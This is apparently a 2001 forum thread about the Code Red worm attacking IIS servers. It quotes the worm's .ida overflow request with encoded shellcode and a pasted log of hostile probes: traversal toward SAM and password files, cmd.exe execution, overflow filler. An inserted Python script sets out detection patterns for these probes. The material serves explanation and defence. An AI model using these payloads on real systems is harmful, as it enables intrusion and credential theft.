July 19, 2001
3:57 PM
posted by schampeo at 4:08 PM on July 19, 2001
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a
not this
posted by machaus at 4:21 PM on July 19, 2001
posted by bizwank at 4:24 PM on July 19, 2001
We were tooling around with the damn server trying to solve what was wrong. Went to windows update and their security update fixed the issue.
And I was just cursing the fact that it was an IIS server as well. This is my first week at my new job and I was hoping they would be running Apache; thankfully some of the systems here are Apache and *nix based.
Microsoft strikes again.
posted by physics at 4:50 PM on July 19, 2001
posted by jjg at 5:02 PM on July 19, 2001
Anyone know what that's all about? It's just been happening this week, never before.
posted by Succa at 5:53 PM on July 19, 2001
I'm not clear on these kinds of attacks, though. The IP addresses that show up on my logs are IP addresses of infected hosts who are trying to infect the machine my site is on?
posted by idiolect at 6:04 PM on July 19, 2001
I've been getting very odd referrals lately. Sites that in no way link to mine.
IE bug, I'm told. The person has your window open and that other window open.
I'm sometimes appalled at what people read concurrent with the pocket....
posted by rebeccablood at 6:06 PM on July 19, 2001
That said, I'm running Apache as well.
posted by mike at 6:11 PM on July 19, 2001
posted by machaus at 6:11 PM on July 19, 2001
Now that would be funny...
Hey, anyone else get the symbolic irony of a bunch of Windows servers attacking whitehouse.gov??
posted by fooljay at 6:18 PM on July 19, 2001
posted by greyscale at 6:43 PM on July 19, 2001
Nice to know exactly what's going on though, even if it's only going on to other people! :-)
posted by benzo8 at 7:41 PM on July 19, 2001
SEE! Another reason not to EVER hardcode ip addresses...
posted by smackfu at 8:10 PM on July 19, 2001
And greyscale, what do you mean "making an association"? The worm itself claims to be from China. Basically, it was (or was meant to look like it was) made by a Chinese hacker who doesn't like the US government all that much.
posted by whatnotever at 9:09 PM on July 19, 2001
posted by jasonshellen at 9:49 PM on July 19, 2001
[15:51:52 +1000] "HEAD / HTTP/1.0"
[16:01:54 +1000] "GET /."./."./winnt/win.ini .php3 HTTP/1.0"
[16:01:55 +1000] "GET /....../autoexec.bat HTTP/1.0"
[16:01:56 +1000] "GET /..../config.sys HTTP/1.0"
[16:01:57 +1000] "GET /../../../../../../Scandisk.log HTTP/1.0"
[16:01:57 +1000] "GET /../../../../../winnt/repair/sam._ HTTP/1.0"
[16:01:58 +1000] "GET /../../../../config.sys HTTP/1.0"
[16:01:59 +1000] "GET /../../../autoexec.bat HTTP/1.0"
[16:02:00 +1000] "GET /../../../scandisk.log HTTP/1.0"
[16:02:01 +1000] "GET /../../windows/user.dat HTTP/1.0"
[16:02:02 +1000] "GET /..\..\..\winnt\repair\sam._ HTTP/1.0"
[16:02:02 +1000] "GET /..\\..\\..\\..\\..\\..\autoexec.bat HTTP/1.0"
[16:02:03 +1000] "GET /..\\..\\..\winnt\repair\sam._ HTTP/1.0"
[16:02:04 +1000] "GET /.nsf/../winnt/win.ini HTTP/1.0"
[16:02:08 +1000] "GET /_private/shopping_cart.mdb HTTP/1.0"
[16:02:08 +1000] "GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.0"
[16:02:09 +1000] "GET /_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 HTTP/1.0"
[16:02:10 +1000] "GET /_vti_bin/shtml.dll HTTP/1.0"
[16:02:14 +1000] "GET /_vti_bin/shtml.dll/nosuch.htm HTTP/1.0"
[16:02:15 +1000] "GET /_vti_bin/shtml.exe HTTP/1.0"
[16:02:15 +1000] "GET /_vti_inf.html HTTP/1.0" 0.013
[16:02:16 +1000] "GET /_vti_pvt/administrators.pwd HTTP/1.0"
[16:02:19 +1000] "GET /_vti_pvt/shtml.exe HTTP/1.0"
[16:05:17 +1000] "GET /cgi-bin/build.cgi HTTP/1.0"
[16:05:17 +1000] "GET /cgi-bin/cached_feed.cgi HTTP/1.0"
[16:05:18 +1000] "GET /cgi-bin/cachemgr.cgi HTTP/1.0"
[16:05:19 +1000] "GET /cgi-bin/cal_make.pl HTTP/1.0"
[16:05:20 +1000] "GET /cgi-bin/calender.pl HTTP/1.0"
[16:05:26 +1000] "GET /cgi-bin/cgiforum.pl HTTP/1.0"
[16:05:27 +1000] "GET /cgi-bin/cgiwrap HTTP/1.0"
[16:05:28 +1000] "GET /cgi-bin/changepw.cgi HTTP/1.0"
[16:05:29 +1000] "GET /cgi-bin/classifieds.cgi HTTP/1.0"
[16:07:27 +1000] "GET /customer/ HTTP/1.0"
[16:07:31 +1000] "GET /data/ HTTP/1.0"
[16:07:32 +1000] "GET /database/ HTTP/1.0"
[16:07:33 +1000] "GET /databases/ HTTP/1.0"
[16:07:33 +1000] "GET /db/ HTTP/1.0"
[16:07:34 +1000] "GET /dbase/ HTTP/1.0"
[16:07:54 +1000] "GET /girl/ HTTP/1.0"
[16:07:58 +1000] "GET /girls/ HTTP/1.0"
[16:07:59 +1000] "GET /hire/ HTTP/1.0"
[16:08:00 +1000] "GET /htdocs/ HTTP/1.0"
[16:08:01 +1000] "GET /html/snort2html.html HTTP/1.0"
[16:08:02 +1000] "GET /idea/ HTTP/1.0"
[16:08:03 +1000] "GET /ideas/ HTTP/1.0"
[16:08:07 +1000] "GET /image/ HTTP/1.0"
[16:08:07 +1000] "GET /images/ HTTP/1.0"
[16:09:16 +1000] "GET /phpgroupware/inc/phpgwapi/phpgw.inc.php HTTP/1.0"
[16:09:17 +1000] "GET /phpPhotoAlbum/explorer.php HTTP/1.0"
[16:09:18 +1000] "GET /piranha/secure/passwd.php3 HTTP/1.0"
[16:09:19 +1000] "GET /porno/ HTTP/1.0"
[16:09:20 +1000] "GET /ports/ HTTP/1.0"
[16:09:24 +1000] "GET /private/ HTTP/1.0"
[16:09:25 +1000] "GET /private/.htpasswd HTTP/1.0"
[16:09:25 +1000] "GET /program/ HTTP/1.0"
[16:09:26 +1000] "GET /programming/ HTTP/1.0"
[16:09:43 +1000] "GET /secret/ HTTP/1.0"
[16:09:44 +1000] "GET /secret/secret/add-user.shmtl HTTP/1.0"
[16:09:47 +1000] "GET /secret/secret/change-passwd.shtml HTTP/1.0"
[16:09:48 +1000] "GET /secret/secret/sql_tool.shtml HTTP/1.0"
[16:09:58 +1000] "GET /sex/ HTTP/1.0"
[16:13:45 +1000] "GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
[16:13:46 +1000] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
[16:13:47 +1000] "GET /null.ida HTTP/1.0"
[16:13:48 +1000] "GET /null.idq HTTP/1.0"
[16:13:48 +1000] "GET /NULL.printer HTTP/1.0" http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...etc, etc
677 lines in total, all coming from a server with an IP address somewhere in China.
posted by ZippityBuddha at 10:16 PM on July 19, 2001
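A small defender-side triage script for log lines in the bracketed-timestamp format ZippityBuddha pasted, added here as an example and not code from the thread: it tags each request with the probe family it belongs to (the Code Red .ida request machaus quoted earlier, the .ida/.idq/.printer ISAPI probes, directory traversal, cmd.exe, FrontPage paths and fetches of sensitive files) and counts the tags, so a 677-line log can be summarised instead of read line by line. The sample lines, the rule names and the 100-character repeat threshold are constructed assumptions.

```python
import re

# Constructed sample lines in the excerpt's bracketed-timestamp format; the .ida
# line stands in for the Code Red request quoted earlier, with the N-run generated.
SAMPLE_LOG = [
    '[15:51:52 +1000] "HEAD / HTTP/1.0"',
    '[16:01:54 +1000] "GET /index.html HTTP/1.0"',
    r'[16:02:02 +1000] "GET /..\..\..\winnt\repair\sam._ HTTP/1.0"',
    '[16:02:16 +1000] "GET /_vti_pvt/administrators.pwd HTTP/1.0"',
    '[16:13:45 +1000] "GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0"',
    '[16:13:47 +1000] "GET /null.ida HTTP/1.0"',
    '[16:20:00 +1000] "GET /default.ida?' + "N" * 224 + '%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0"',
]

# One log line: [timestamp] "METHOD target HTTP/x.y"; anything after the target is ignored.
LINE_RE = re.compile(r'^\[(?P<ts>[^\]]+)\]\s+"(?P<method>[A-Z]+)\s+(?P<target>\S+)')

# Signatures for the probe families visible in the thread, in reporting order.
RULES = [
    ("code_red_ida", re.compile(r"\.ida\?.*%u[0-9a-f]{4}", re.I)),  # .ida plus %u-escaped payload
    ("isapi_probe", re.compile(r"\.(ida|idq|printer)(\?|$)", re.I)),  # Index Server / .printer ISAPI
    ("cmd_exe", re.compile(r"cmd\.exe", re.I)),  # decode / Unicode cmd.exe attempts
    ("traversal", re.compile(r"\.\.([/\\]|%2f|%5c)", re.I)),  # raw or URL-encoded ../ and ..\
    ("frontpage", re.compile(r"/_vti_", re.I)),  # FrontPage Server Extensions paths
    ("sensitive_file", re.compile(r"(sam\._|\.pwd|\.htpasswd|win\.ini|autoexec\.bat|config\.sys)$", re.I)),
    ("overflow_run", re.compile(r"(.)\1{99,}")),  # 100+ repeats of one character (overflow filler)
]

def classify(target):
    # Names of every rule whose pattern matches the request target, in RULES order.
    return [name for name, rx in RULES if rx.search(target)]

def scan_log(lines):
    # Parse each line; keep (timestamp, method, target, tags) for flagged requests only.
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and (tags := classify(m["target"])):
            hits.append((m["ts"], m["method"], m["target"], tags))
    return hits

def summarize(hits):
    # Count how often each tag fired across the scan.
    counts = {}
    for _, _, _, tags in hits:
        for tag in tags:
            counts[tag] = counts.get(tag, 0) + 1
    return counts
```

A real access log carries the client address with each line; a code_red_ida hit from an address marks that host as already infected, since the worm scans from the machines it has compromised.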
I can imagine somebody sitting down one day, writing a leet script, thinking, "If the server is secure... heck, it just might have free porn!"
posted by whatnotever at 11:59 PM on July 19, 2001
The worm uses vulnerabilities in Solaris to do most of the work, and people will only talk about how IIS is the problem?
Of course, this only happens to you if you didn't patch a KNOWN security problem that has had a patch out for more than a month.
Yeah, keep blaming MS.
posted by soulhuntre at 12:14 AM on July 20, 2001
posted by whatnotever at 12:32 AM on July 20, 2001
posted by alana at 12:38 AM on July 20, 2001
Uhhhh, yeah. Could you explain how a vulnerability in Solaris is causing a buffer overflow on Microsoft Internet Information Servers (IIS)?? Maybe I'm missing something...
Of course, this only happens to you if you didn't patch a KNOWN security problem that has had a patch out for more than a month.
Yeah, keep blaming MS.
True. It is an old patch (in internet time anyway), but if it weren't for the constantly buggy and insecure IIS, would this be an issue? Microsoft software is generally, and has always been, insecure for a reason, and it's not because they are incompetent...
posted by fooljay at 12:39 AM on July 20, 2001
posted by alana at 1:16 AM on July 20, 2001
posted by samsara at 7:17 AM on July 20, 2001
I'll stop blaming MS when they stop coming out with patches for the various vulnerabilities that crop up on a daily basis. Continual patches are not indicative of a complete, secure, finished product, but that gets into the whole other discussion of buggy software. Can you tell I'm still bitter about TPTB switching from a Unix server to NT five years ago?
posted by evixir at 8:31 AM on July 20, 2001
"Honest, non snarky question . . . what does Solaris have to do with this?"
There is a worm that actually spreads mostly on Solaris (unixish) and uses those platforms to attack IIS servers.
Let's be honest. IIS/Windows is THE target environment. It has a huge bullseye painted on it and every two bit hacker with dreams of glory wants to take a run at it.
It does a great job, but you simply must stay updated.
Anyone who claims that it isn't the job of the admin to keep up with updates/patches is just not thinking this through.
What is most upsetting is the hypocrisy. Linux root exploits pop up all the time, and there isn't this kind of uproar - all you'll see is folks saying "dammit, if you can't stay current then you're to blame".
And it's true.
A little intellectual honesty and consistency should not be too much to ask.
But all that goes by the wayside for a chance to take a shot at MS... it would be sad if it wasn't so funny.
posted by soulhuntre at 10:18 AM on July 20, 2001
What we may be seeing here is not so much the flawedness of MS software, which does exist, but the attraction to hacking it in particular. Both because of market size and hacker dislike of MS and its success, MS software is often targeted for greater inspection than most software gets, which may be why so many holes are both found and then heavily publicized (these same folks aren't up late at nights finding ways to humiliatingly find holes in Linux, because that would disturb their precious pipedream about free software...). It's not dissimilar to the way that the most publicized diseases get the most funding and research. Doesn't mean the disease is an easy one to cure, or was the most dangerous or life-threatening, but rather that the "squeaky wheel gets the grease".
posted by hincandenza at 10:28 AM on July 20, 2001
As for getting my router updated, there's no way to get the update from Cisco as they do not allow direct updates, and my internet provider, Conectiv, can't support the new version because their equipment doesn't like how the new version works with NAT. It's the whole industry I tell ya...sheesh!
posted by samsara at 10:55 AM on July 20, 2001
posted by vanderwal at 11:20 AM on July 20, 2001
Gawd, I don't think anyone is claiming that. But both Unix and Windows admins know who has the most exploits (which has to do with shipping the most buggy insecure software. Hint: It's not Unix). So the primary blame lies with the software maker. The secondary blame lies with the admins who refuse, are too lazy to, or don't know how to patch systems and do security audits.
What is most upsetting is the hypocrisy. Linux root exploits pop up all the time, and there isn't this kind of uproar
There are a few reasons for that, but mostly it comes down to, in my experience anyway, by and large, Unix boxes are tended to better than Windows boxes. Microsoft makes it easy for anyone to set up a server. If we only gave driver's licenses to professional race car drivers there would be a lot fewer accidents even though the speed limit would be 125MPH. Unix's relative difficulty creates a hurdle for incompetence. That's not to say there are no incompetent Unix admins, there are just fewer of them percentage-wise.
What we may be seeing here is not so much the flawedness of MS software, which does exist, but the attraction to hacking it in particular. Both because of market size and hacker dislike of MS and its success, MS software is often targeted
I'll give you that second part. For sure, Microsoft makes its own bed. As far as the market share, that holds true for client software but not server software. The (second) problem is that many Windows servers aren't mission critical, so they don't have the level of auditing and security one would have on most Unix servers hooked to the Net.
heavily publicized
While Microsoft bugs are certainly talked about more in the media, it is typically because they affect client software and hence are more newsworthy for the masses. Surely, though, there is a bit of media momentum there as well...
I have been watching CERT et al for about 4 years and can tell you that there actually are more Microsoft bugs than any other individual platform. In this instance, you can't just say Microsoft vs Unix because Unix contains a whole host of individually developed OSes.
posted by fooljay at 11:59 AM on July 20, 2001
posted by fooljay at 12:00 PM on July 20, 2001
posted by waxpancake at 4:01 PM on July 19, 2001